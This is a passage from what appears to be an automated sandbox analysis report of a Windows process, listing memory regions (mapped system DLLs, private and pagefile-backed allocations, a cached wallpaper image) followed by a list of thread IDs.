"c:\\windows\\system32\\wtsapi32.dll") Region: id = 1000 start_va = 0x7fffc6760000 end_va = 0x7fffc688ffff monitored = 0 entry_point = 0x7fffc67fdcf0 region_type = mapped_file name = "dsreg.dll" filename = "\\Windows\\System32\\dsreg.dll" (normalized: "c:\\windows\\system32\\dsreg.dll") Region: id = 1001 start_va = 0x7fffc6890000 end_va = 0x7fffc68a1fff monitored = 0 entry_point = 0x7fffc6897280 region_type = mapped_file name = "efsutil.dll" filename = "\\Windows\\System32\\efsutil.dll" (normalized: "c:\\windows\\system32\\efsutil.dll") Region: id = 1002 start_va = 0x7fffc68b0000 end_va = 0x7fffc68e0fff monitored = 0 entry_point = 0x7fffc68b2590 region_type = mapped_file name = "portabledevicetypes.dll" filename = "\\Windows\\System32\\PortableDeviceTypes.dll" (normalized: "c:\\windows\\system32\\portabledevicetypes.dll") Region: id = 1003 start_va = 0x7fffc68f0000 end_va = 0x7fffc6904fff monitored = 0 entry_point = 0x7fffc68f29c0 region_type = mapped_file name = "wpdshserviceobj.dll" filename = "\\Windows\\System32\\WPDShServiceObj.dll" (normalized: "c:\\windows\\system32\\wpdshserviceobj.dll") Region: id = 1004 start_va = 0x7fffc6910000 end_va = 0x7fffc6955fff monitored = 0 entry_point = 0x7fffc69127a0 region_type = mapped_file name = "bthprops.cpl" filename = "\\Windows\\System32\\bthprops.cpl" (normalized: "c:\\windows\\system32\\bthprops.cpl") Region: id = 1005 start_va = 0x7fffc6970000 end_va = 0x7fffc6f2ffff monitored = 0 entry_point = 0x7fffc6a49920 region_type = mapped_file name = "d2d1.dll" filename = "\\Windows\\System32\\d2d1.dll" (normalized: "c:\\windows\\system32\\d2d1.dll") Region: id = 1006 start_va = 0x7fffc6f30000 end_va = 0x7fffc7085fff monitored = 0 entry_point = 0x7fffc6f5b240 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 1007 start_va = 0x7fffc7090000 end_va = 0x7fffc7274fff monitored = 0 entry_point = 0x7fffc70eddd0 region_type = mapped_file name = "dcomp.dll" filename = "\\Windows\\System32\\dcomp.dll" (normalized: "c:\\windows\\system32\\dcomp.dll") Region: id = 1008 start_va = 0x7fffc7600000 end_va = 0x7fffc7959fff monitored = 0 entry_point = 0x7fffc7682d50 region_type = mapped_file name = "coreuicomponents.dll" filename = "\\Windows\\System32\\CoreUIComponents.dll" (normalized: "c:\\windows\\system32\\coreuicomponents.dll") Region: id = 1009 start_va = 0x7fffc7960000 end_va = 0x7fffc7a51fff monitored = 0 entry_point = 0x7fffc79b70f0 region_type = mapped_file name = "coremessaging.dll" filename = "\\Windows\\System32\\CoreMessaging.dll" (normalized: "c:\\windows\\system32\\coremessaging.dll") Region: id = 1010 start_va = 0x7fffc7bb0000 end_va = 0x7fffc7c3ffff monitored = 0 entry_point = 0x7fffc7bc0880 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 1011 start_va = 0x7fffc7c60000 end_va = 0x7fffc7cfefff monitored = 0 entry_point = 0x7fffc7c89120 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 1012 start_va = 0x7fffc7d40000 end_va = 0x7fffc7d53fff monitored = 0 entry_point = 0x7fffc7d44280 region_type = mapped_file name = "resourcepolicyclient.dll" filename = "\\Windows\\System32\\ResourcePolicyClient.dll" (normalized: "c:\\windows\\system32\\resourcepolicyclient.dll") Region: id = 1013 start_va = 0x7fffc7e30000 end_va = 0x7fffc7f08fff monitored = 0 entry_point = 0x7fffc7e87a70 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 1014 start_va = 0x7fffc7f10000 end_va = 0x7fffc7f39fff monitored = 0 entry_point = 0x7fffc7f19e30 region_type = mapped_file name = "rmclient.dll" filename = "\\Windows\\System32\\rmclient.dll" (normalized: "c:\\windows\\system32\\rmclient.dll") Region: id = 1015 start_va = 0x7fffc8010000 end_va = 0x7fffc803dfff monitored = 0 entry_point = 0x7fffc80142d0 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 1016 start_va = 0x7fffc8120000 end_va = 0x7fffc8132fff monitored = 0 entry_point = 0x7fffc8123f60 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 1017 start_va = 0x7fffc8320000 end_va = 0x7fffc8aa9fff monitored = 0 entry_point = 0x7fffc84dc050 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 1018 start_va = 0x7fffc8af0000 end_va = 0x7fffc8be2fff monitored = 0 entry_point = 0x7fffc8b144d0 region_type = mapped_file name = "dxgi.dll" filename = "\\Windows\\System32\\dxgi.dll" (normalized: "c:\\windows\\system32\\dxgi.dll") Region: id = 1019 start_va = 0x7fffc8bf0000 end_va = 0x7fffc8d0afff monitored = 0 entry_point = 0x7fffc8bfc250 region_type = mapped_file name = "tdh.dll" filename = "\\Windows\\System32\\tdh.dll" (normalized: "c:\\windows\\system32\\tdh.dll") Region: id = 1020 start_va = 0x7fffc8d40000 end_va = 0x7fffc8d64fff monitored = 0 entry_point = 0x7fffc8d43920 region_type = mapped_file name = "sppc.dll" filename = "\\Windows\\System32\\sppc.dll" (normalized: "c:\\windows\\system32\\sppc.dll") Region: id = 1021 start_va = 0x7fffc8d70000 end_va = 0x7fffc8d98fff monitored = 0 entry_point = 0x7fffc8d71bd0 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 1022 start_va = 0x7fffc9000000 end_va = 0x7fffc9032fff monitored = 0 entry_point = 0x7fffc9006930 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 1023 start_va = 0x7fffc9040000 end_va = 0x7fffc9068fff monitored = 0 entry_point = 0x7fffc9049780 region_type = mapped_file name = "profext.dll" filename = "\\Windows\\System32\\profext.dll" (normalized: "c:\\windows\\system32\\profext.dll") Region: id = 1024 start_va = 0x7fffc92d0000 end_va = 0x7fffc9359fff monitored = 0 entry_point = 0x7fffc9315870 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll") Region: id = 1025 start_va = 0x7fffc9360000 end_va = 0x7fffc9376fff monitored = 0 entry_point = 0x7fffc9361d60 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 1026 start_va = 0x7fffc9590000 end_va = 0x7fffc95cafff monitored = 0 entry_point = 0x7fffc959a620 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1027 start_va = 0x7fffc95d0000 end_va = 0x7fffc95dbfff monitored = 0 entry_point = 0x7fffc95d1ce0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 1028 start_va = 0x7fffc9a70000 end_va = 0x7fffc9a87fff monitored = 0 entry_point = 0x7fffc9a74aa0 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1029 start_va = 0x7fffc9a90000 end_va = 0x7fffc9a9bfff monitored = 0 entry_point = 0x7fffc9a92200 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1030 start_va = 0x7fffc9ad0000 end_va = 0x7fffc9b29fff monitored = 0 entry_point = 0x7fffc9adb770 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 1031 start_va = 0x7fffc9b80000 end_va = 0x7fffc9baafff monitored = 0 entry_point = 0x7fffc9b82db0 region_type = mapped_file name = "wldp.dll" filename = "\\Windows\\System32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll") Region: id = 1032 start_va = 0x7fffc9bb0000 end_va = 0x7fffc9beafff monitored = 0 entry_point = 0x7fffc9bb4000 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 1033 start_va = 0x7fffc9bf0000 end_va = 0x7fffc9c16fff monitored = 0 entry_point = 0x7fffc9bf6200 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 1034 start_va = 0x7fffc9d00000 end_va = 0x7fffc9d11fff monitored = 0 entry_point = 0x7fffc9d055f0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 1035 start_va = 0x7fffc9ec0000 end_va = 0x7fffc9eebfff monitored = 0 entry_point = 0x7fffc9ec7370 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 1036 start_va = 0x7fffc9f10000 end_va = 0x7fffc9f21fff monitored = 0 entry_point = 0x7fffc9f13e30 region_type = mapped_file name = "umpdc.dll" filename = "\\Windows\\System32\\umpdc.dll" (normalized: "c:\\windows\\system32\\umpdc.dll") Region: id = 1037 start_va = 0x7fffc9f30000 end_va = 0x7fffc9f7afff monitored = 0 entry_point = 0x7fffc9f33480 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1038 start_va = 0x7fffc9f80000 end_va = 0x7fffca021fff monitored = 0 entry_point = 0x7fffc9faca60 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 1039 start_va = 0x7fffca030000 end_va = 0x7fffca05dfff monitored = 0 entry_point = 0x7fffca034f10 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 1040 start_va = 0x7fffca060000 end_va = 0x7fffca090fff monitored = 0 entry_point = 0x7fffca06e380 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1041 start_va = 0x7fffca0b0000 end_va = 0x7fffca0cefff monitored = 0 entry_point = 0x7fffca0b8ca0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1042 start_va = 0x7fffca220000 end_va = 0x7fffca26cfff monitored = 0 entry_point = 0x7fffca233280 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1043 start_va = 0x7fffca270000 end_va = 0x7fffca36ffff monitored = 0 entry_point = 0x7fffca285ac0 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 1044 start_va = 0x7fffca370000 end_va = 0x7fffca479fff monitored = 0 entry_point = 0x7fffca3a1300 region_type = mapped_file name = "gdi32full.dll" filename = "\\Windows\\System32\\gdi32full.dll" (normalized: "c:\\windows\\system32\\gdi32full.dll") Region: id = 1045 start_va = 0x7fffca480000 end_va = 0x7fffca4fefff monitored = 0 entry_point = 0x7fffca4b73e0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 1046 start_va = 0x7fffca500000 end_va = 0x7fffca55ffff monitored = 0 entry_point = 0x7fffca510380 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 1047 start_va = 0x7fffca560000 end_va = 0x7fffca5fcfff monitored = 0 entry_point = 0x7fffca575390 region_type = mapped_file name = "msvcp_win.dll" filename = "\\Windows\\System32\\msvcp_win.dll" (normalized: "c:\\windows\\system32\\msvcp_win.dll") Region: id = 1048 start_va = 0x7fffca600000 end_va = 0x7fffca75cfff monitored = 0 entry_point = 0x7fffca64efa0 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 1049 start_va = 0x7fffca760000 end_va = 0x7fffca781fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "win32u.dll" filename = "\\Windows\\System32\\win32u.dll" (normalized: "c:\\windows\\system32\\win32u.dll") Region: id = 1050 start_va = 0x7fffca790000 end_va = 0x7fffcaa56fff monitored = 0 entry_point = 0x7fffca7a1bd0 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1051 start_va = 0x7fffcaa60000 end_va = 0x7fffcaa86fff monitored = 0 entry_point = 0x7fffcaa68690 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 1052 start_va = 0x7fffcaa90000 end_va = 0x7fffcaba4fff monitored = 0 entry_point = 0x7fffcaaceb60 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1053 start_va = 0x7fffcad80000 end_va = 0x7fffcae2dfff monitored = 0 entry_point = 0x7fffcadbb940 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 1054 start_va = 0x7fffcae30000 end_va = 0x7fffcb296fff monitored = 0 entry_point = 0x7fffcae53230 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 1055 start_va = 0x7fffcb2a0000 end_va = 0x7fffcb33afff monitored = 0 entry_point = 0x7fffcb2bc3e0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1056 start_va = 0x7fffcb350000 end_va = 0x7fffcb424fff monitored = 0 entry_point = 0x7fffcb36d190 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1057 start_va = 0x7fffcb440000 end_va = 0x7fffcb4fcfff monitored = 0 entry_point = 0x7fffcb457070 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1058 start_va = 0x7fffcb560000 end_va = 0x7fffcb5fdfff monitored = 0 entry_point = 0x7fffcb567850 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1059 start_va = 0x7fffcb600000 end_va = 0x7fffcb6a9fff monitored = 0 entry_point = 0x7fffcb615470 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1060 start_va = 0x7fffcb790000 end_va = 0x7fffcb798fff monitored = 0 entry_point = 0x7fffcb792020 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1061 start_va = 0x7fffcb7a0000 end_va = 0x7fffcb93ffff monitored = 0 entry_point = 0x7fffcb7b7a10 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1062 start_va = 0x7fffcb940000 end_va = 0x7fffcb96ffff monitored = 0 entry_point = 0x7fffcb9414d0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1063 start_va = 0x7fffcb970000 end_va = 0x7fffcb9c4fff monitored = 0 entry_point = 0x7fffcb97a7e0 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1064 start_va = 0x7fffcb9d0000 end_va = 0x7fffcba48fff monitored = 0 entry_point = 0x7fffcb9f28f0 region_type = mapped_file name = "coml2.dll" filename = "\\Windows\\System32\\coml2.dll" (normalized: "c:\\windows\\system32\\coml2.dll") Region: id = 1065 start_va = 0x7fffcbae0000 end_va = 0x7fffcbb87fff monitored = 0 entry_point = 0x7fffcbafd990 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1066 start_va = 0x7fffcbb90000 end_va = 0x7fffcbee3fff monitored = 0 entry_point = 0x7fffcbc81d00 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1067 start_va = 0x7fffcbef0000 end_va = 0x7fffcc018fff monitored = 0 entry_point = 0x7fffcbf16140 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1068 start_va = 0x7fffcc020000 end_va = 0x7fffcc08afff monitored = 0 entry_point = 0x7fffcc034300 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1069 start_va = 0x7fffcc090000 end_va = 0x7fffcc7c0fff monitored = 0 entry_point = 0x7fffcc19e6e0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1070 start_va = 0x7fffcc830000 end_va = 0x7fffcc952fff monitored = 0 entry_point = 0x7fffcc88da30 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1071 start_va = 0x7fffcc960000 end_va = 0x7fffcc989fff monitored = 0 entry_point = 0x7fffcc9648d0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1072 start_va = 0x7fffcca30000 end_va = 0x7fffccc23fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1156 start_va = 0x2780000 end_va = 0x2782fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002780000" filename = "" Region: id = 1157 start_va = 0x2790000 end_va = 0x2790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002790000" filename = "" Region: id = 1200 start_va = 0xf240000 end_va = 0xf731fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f240000" filename = "" Region: id = 1224 start_va = 0x103c0000 end_va = 0x108b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000103c0000" filename = "" Region: id = 2046 start_va = 0xf240000 end_va = 0xf731fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f240000" filename = "" Region: id = 2052 start_va = 0x10dc0000 end_va = 0x112b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010dc0000" filename = "" Region: id = 2199 start_va = 0xf240000 end_va = 0xf731fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f240000" filename = "" Region: id = 2206 start_va = 0x112c0000 end_va = 0x117b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000112c0000" filename = "" Region: id = 2234 start_va = 0x2010000 end_va = 0x2011fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002010000" filename = "" Region: id = 2269 start_va = 0x117c0000 end_va = 0x11cb1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000117c0000" filename = "" Region: id = 2429 start_va = 0x2780000 end_va = 0x278dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002780000" filename = "" Region: id = 2529 start_va = 0x2780000 end_va = 0x2782fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002780000" filename = "" Region: id = 2530 start_va = 0x2790000 end_va = 0x2790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002790000" filename = "" Region: id = 2554 start_va = 0x2010000 end_va = 0x2011fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002010000" filename = "" Region: id = 2560 start_va = 0x7fffae280000 end_va = 0x7fffae29dfff monitored = 0 entry_point = 0x7fffae281fa0 region_type = mapped_file name = "securityhealthproxystub.dll" filename = "\\Windows\\System32\\SecurityHealthProxyStub.dll" (normalized: "c:\\windows\\system32\\securityhealthproxystub.dll") Region: id = 2637 start_va = 0xf240000 end_va = 0xf731fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f240000" filename = "" Region: id = 2638 start_va = 0x11cc0000 end_va = 0x121b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011cc0000" filename = "" Region: id = 2688 start_va = 0x121c0000 end_va = 0x126b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000121c0000" filename = "" Region: id = 2804 start_va = 0xf240000 end_va = 0xf731fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f240000" filename = "" Region: id = 2980 start_va = 0xf740000 end_va = 0xfc31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f740000" filename = "" Region: id = 3001 start_va = 0xe370000 end_va = 0xe86ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000e370000" filename = "" Region: id = 3443 start_va = 0x2780000 end_va = 0x27fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002780000" filename = "" Region: id = 3444 start_va = 0x3e80000 end_va = 0x3e9afff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cachedimage_1440_900_pos4.jpg" filename = "\\Users\\OqXZRaykm\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles\\CachedImage_1440_900_POS4.jpg" (normalized: "c:\\users\\oqxzraykm\\appdata\\roaming\\microsoft\\windows\\themes\\cachedfiles\\cachedimage_1440_900_pos4.jpg") Region: id = 3445 start_va = 0xe370000 end_va = 0xe861fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000e370000" filename = "" Region: id = 3518 start_va = 0x3e80000 end_va = 0x3e9afff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cachedimage_1440_900_pos4.jpg" filename = "\\Users\\OqXZRaykm\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles\\CachedImage_1440_900_POS4.jpg" (normalized: "c:\\users\\oqxzraykm\\appdata\\roaming\\microsoft\\windows\\themes\\cachedfiles\\cachedimage_1440_900_pos4.jpg") Region: id = 3849 start_va = 0x2000000 end_va = 0x201afff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cachedimage_1440_900_pos4.jpg" filename = "\\Users\\OqXZRaykm\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles\\CachedImage_1440_900_POS4.jpg" (normalized: "c:\\users\\oqxzraykm\\appdata\\roaming\\microsoft\\windows\\themes\\cachedfiles\\cachedimage_1440_900_pos4.jpg") Region: id = 4038 start_va = 0x650000 end_va = 0x651fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 4039 start_va = 0x660000 end_va = 0x67afff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cachedimage_1440_900_pos4.jpg" filename = "\\Users\\OqXZRaykm\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles\\CachedImage_1440_900_POS4.jpg" (normalized: "c:\\users\\oqxzraykm\\appdata\\roaming\\microsoft\\windows\\themes\\cachedfiles\\cachedimage_1440_900_pos4.jpg") Region: id = 4503 start_va = 0x660000 end_va = 0x662fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 4504 start_va = 0x670000 end_va = 0x670fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 4795 start_va = 0x660000 end_va = 0x67efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 4796 start_va = 0x680000 end_va = 0x69efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Region: id = 4797 start_va = 0x7fffb2e30000 end_va = 0x7fffb2f09fff monitored = 0 entry_point = 0x7fffb2e565a0 region_type = mapped_file name = "windows.internal.shell.broker.dll" filename = "\\Windows\\System32\\Windows.Internal.Shell.Broker.dll" (normalized: "c:\\windows\\system32\\windows.internal.shell.broker.dll") Region: id = 4799 start_va = 0x650000 end_va = 0x651fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 4800 start_va = 0x660000 end_va = 0x660fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 4801 start_va = 0x680000 end_va = 0x6a1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000680000" filename = "" Region: id = 4802 start_va = 0x6b0000 end_va = 0x6b3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006b0000" filename = "" Region: id = 4803 start_va = 0x4000000 end_va = 0x407ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004000000" filename = "" Region: id = 4804 start_va = 0x5880000 end_va = 0x59c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005880000" filename = "" Region: id = 5062 start_va = 0x660000 end_va = 0x67efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 5063 start_va = 0x2000000 end_va = 0x201efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002000000" filename = "" Region: id = 5064 start_va = 0x3e80000 end_va = 0x3ea1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e80000" filename = "" Region: id = 5065 start_va = 0x3eb0000 end_va = 0x3ecafff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cachedimage_1440_900_pos4.jpg" filename = "\\Users\\OqXZRaykm\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles\\CachedImage_1440_900_POS4.jpg" (normalized: "c:\\users\\oqxzraykm\\appdata\\roaming\\microsoft\\windows\\themes\\cachedfiles\\cachedimage_1440_900_pos4.jpg") Thread: id = 30 os_tid = 0xfe0 Thread: id = 31 os_tid = 0x13e8 Thread: id = 32 os_tid = 0x1394 Thread: id = 33 os_tid = 0x1370 Thread: id = 34 os_tid = 0x135c Thread: id = 35 os_tid = 0x1348 Thread: id = 36 os_tid = 0x1320 Thread: id = 37 os_tid = 0x1310 Thread: id = 38 os_tid = 0x12f0 Thread: id = 39 os_tid = 0x125c Thread: id = 40 os_tid = 0x1244 Thread: id = 41 os_tid = 0x10dc Thread: id = 42 os_tid = 0xa3c Thread: id = 43 os_tid = 0xa38 Thread: id = 44 os_tid = 0xde4 Thread: id = 45 os_tid = 0xfd4 Thread: id = 46 os_tid = 0xfa4 Thread: id = 47 os_tid = 0xd9c Thread: id = 48 os_tid = 0x918 Thread: id = 49 os_tid = 0xec4 Thread: id = 50 os_tid = 0xb98 Thread: id = 51 os_tid = 0xe78 Thread: id = 52 os_tid = 0xba0 Thread: id = 53 os_tid = 0x90c Thread: id = 54 os_tid = 0xf78 Thread: id = 55 os_tid = 0xe28 Thread: id = 56 os_tid = 0xe1c Thread: id = 57 os_tid = 0xe0c Thread: id = 58 os_tid = 0xddc Thread: id = 59 os_tid = 0xdd0 Thread: id = 60 os_tid = 0xdcc Thread: id = 61 os_tid = 0xdc8 Thread: id = 62 os_tid = 0xdc4 Thread: id = 63 os_tid = 0xda8 Thread: id = 64 os_tid = 0xda4 Thread: id = 65 os_tid = 0xc90 Thread: id = 66 os_tid = 0x9a0 Thread: id = 67 os_tid = 0x93c Thread: id = 68 os_tid = 0x968 Thread: id = 69 os_tid = 0xa14 Thread: id = 70 os_tid = 0xbfc Thread: id = 71 os_tid = 0xbf8 Thread: id = 72 os_tid = 0xbe4 Thread: id = 73 os_tid = 0xbc8 Thread: id = 74 os_tid = 0xb8c Thread: id = 75 os_tid = 0xb88 Thread: id = 76 os_tid = 0xb40 Thread: id = 77 os_tid = 0xb34 Thread: id = 78 os_tid = 0xb04 Thread: id = 79 os_tid = 0xafc Thread: id = 80 os_tid = 0xad4 Thread: id = 81 